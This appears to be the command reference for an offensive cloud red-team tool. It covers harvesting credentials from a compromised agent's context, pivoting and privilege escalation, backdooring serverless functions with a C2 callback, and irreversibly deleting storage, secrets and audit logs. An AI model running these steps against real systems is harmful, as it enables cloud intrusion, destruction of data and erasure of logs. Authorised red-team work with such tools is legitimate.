v1.0.0 — 201 tests — OPEN/INJECT/UNLEASHED/DESTROY gates — CHR-signed reports
cd red-specter-specter-charybdis pip install -e . charybdis --help
| Gate | Env Variable / Requirement | Unlocks |
|---|---|---|
| OPEN | None | enumerate, report, gate-status, sessions |
| INJECT | CHARYBDIS_INJECT_TOKEN=<any> | pivot, survey, escalate, engage |
| UNLEASHED | CHARYBDIS_UNLEASHED_TOKEN=<any> | persist |
| DESTROY | CHARYBDIS_DESTROY_KEY + CHARYBDIS_ROE_FILE + --confirm-annihilation + exact confirm string | annihilate |
DESTROY gate ROE file must contain the exact phrase: cloud annihilation authorised
Confirm string must be exactly: I UNDERSTAND THIS WILL IRREVERSIBLY DESTROY CLOUD INFRASTRUCTURE
charybdis enumerate [--oidc-token JWT] [--json-output]
Detects cloud identity from current agent context. Tries: OIDC token → K8s SA token → env vars → AWS IMDS v2 → GCP metadata → Azure IMDS. Creates and saves a new CharybdisSession.
| Flag | Description |
|---|---|
--oidc-token TEXT | OIDC JWT from compromised agent context |
--json-output | Output as JSON |
charybdis pivot --session CHR-XXXXXXXXXXXX [--target-role ARN] [--target-sa SA] [--json-output]
Exchanges initial token for cloud control plane access. Requires INJECT gate.
| Flag | Description |
|---|---|
--session TEXT | Session ID from enumerate (required) |
--target-role TEXT | AWS IAM role ARN to assume |
--target-sa TEXT | GCP service account to impersonate |
--json-output | Output as JSON |
charybdis survey --session CHR-XXXXXXXXXXXX [--json-output]
Enumerates all accessible cloud resources. Returns S3/GCS/Blob buckets, Lambda/Cloud Functions/Azure Functions, Secrets Manager/Secret Manager/Key Vaults. Requires INJECT gate.
charybdis escalate --session CHR-XXXXXXXXXXXX [--json-output]
Checks for privilege escalation vectors: AWS iam:PassRole + Lambda abuse, GCP Vertex AI service agent hijack (CVSS 9.0), Azure Agent ID Administrator (CVSS 8.8). Requires INJECT gate.
charybdis persist --session CHR-XXXXXXXXXXXX --c2 URL [--json-output]
Installs cloud-native backdoor into serverless function. Injects C2_URL and _CHARYBDIS_PERSIST=1 into function environment. Survives restart. Requires UNLEASHED gate.
| Flag | Description |
|---|---|
--c2 URL | C2 callback URL to inject (required) |
charybdis annihilate --session CHR-XXXXXXXXXXXX \ --confirm-annihilation \ --confirm-string "I UNDERSTAND THIS WILL IRREVERSIBLY DESTROY CLOUD INFRASTRUCTURE" \ [--timeout SECONDS] [--json-output]
Irreversible cloud infrastructure destruction. AWS: S3 object deletion + CloudTrail stop. GCP: GCS object deletion + audit log disable. Azure: container deletion + Key Vault secret purge. Requires DESTROY gate.
This operation is IRREVERSIBLE. All S3/GCS/Blob objects, Key Vault secrets, and CloudTrail logs will be permanently deleted. For authorised red team operations only.
charybdis engage [--oidc-token JWT] [--unleashed] [--c2 URL] [--json-output]
Full pipeline: ENUMERATE → PIVOT → SURVEY → ESCALATE → [PERSIST if --unleashed]. Returns blast radius and kill chain narrative. Requires INJECT gate minimum.
charybdis report --session CHR-XXXXXXXXXXXX [--dot] [--save] [--json-output]
Generates CHR-{hex12} Ed25519-signed JSON report with lateral movement graph. OPEN gate.
| Flag | Description |
|---|---|
--dot | Output GraphViz DOT graph to stdout |
--save | Save signed JSON report to ~/.charybdis/reports/ |
charybdis sessions list [--json-output] charybdis sessions show --session CHR-XXXXXXXXXXXX [--json-output]
List all sessions or show full session detail. OPEN gate.
charybdis gate-status
Shows current gate tier and which subsystems are unlocked. OPEN gate.
{
"report_id": "CHR-A3F2B891C047",
"tool": "T130",
"tool_name": "SPECTER CHARYBDIS",
"version": "1.0.0",
"layer": "L28",
"session_id": "CHR-A3F2B891C047",
"cloud_provider": "aws",
"entry_point": "imds",
"identity_name": "my-ec2-role",
"pivot_success": true,
"pivot_method": "direct_credentials",
"blast_radius": 12,
"admin_access": false,
"escalation_vectors": [...],
"resources_discovered": {
"s3_buckets": [...],
"lambda_functions": [...],
"secrets_manager": [...]
},
"kill_chain": "IMDS v2 → STS GetCallerIdentity → iam:PassRole detected → ...",
"movement_graph_dot": "digraph charybdis { ... }",
"wmd_classes": [...],
"mitre_attack": ["T1098", "T1526", "T1530", ...],
"findings": [...],
"remediation": [...],
"signature": "...",
"verify_key": "..."
}
| Variable | Purpose |
|---|---|
CHARYBDIS_INJECT_TOKEN | Activates INJECT gate (any value) |
CHARYBDIS_UNLEASHED_TOKEN | Activates UNLEASHED gate (any value) |
CHARYBDIS_DESTROY_KEY | Path to Ed25519 private key file for DESTROY gate |
CHARYBDIS_ROE_FILE | Path to ROE file (must contain "cloud annihilation authorised") |
AWS_ACCESS_KEY_ID | AWS access key (also detected by ENUMERATE) |
AWS_SECRET_ACCESS_KEY | AWS secret key |
AWS_SESSION_TOKEN | AWS session token |
GOOGLE_APPLICATION_CREDENTIALS | Path to GCP service account JSON (detected by ENUMERATE) |
AZURE_CLIENT_ID | Azure client ID (detected by ENUMERATE) |
AZURE_CLIENT_SECRET | Azure client secret |
AZURE_TENANT_ID | Azure tenant ID |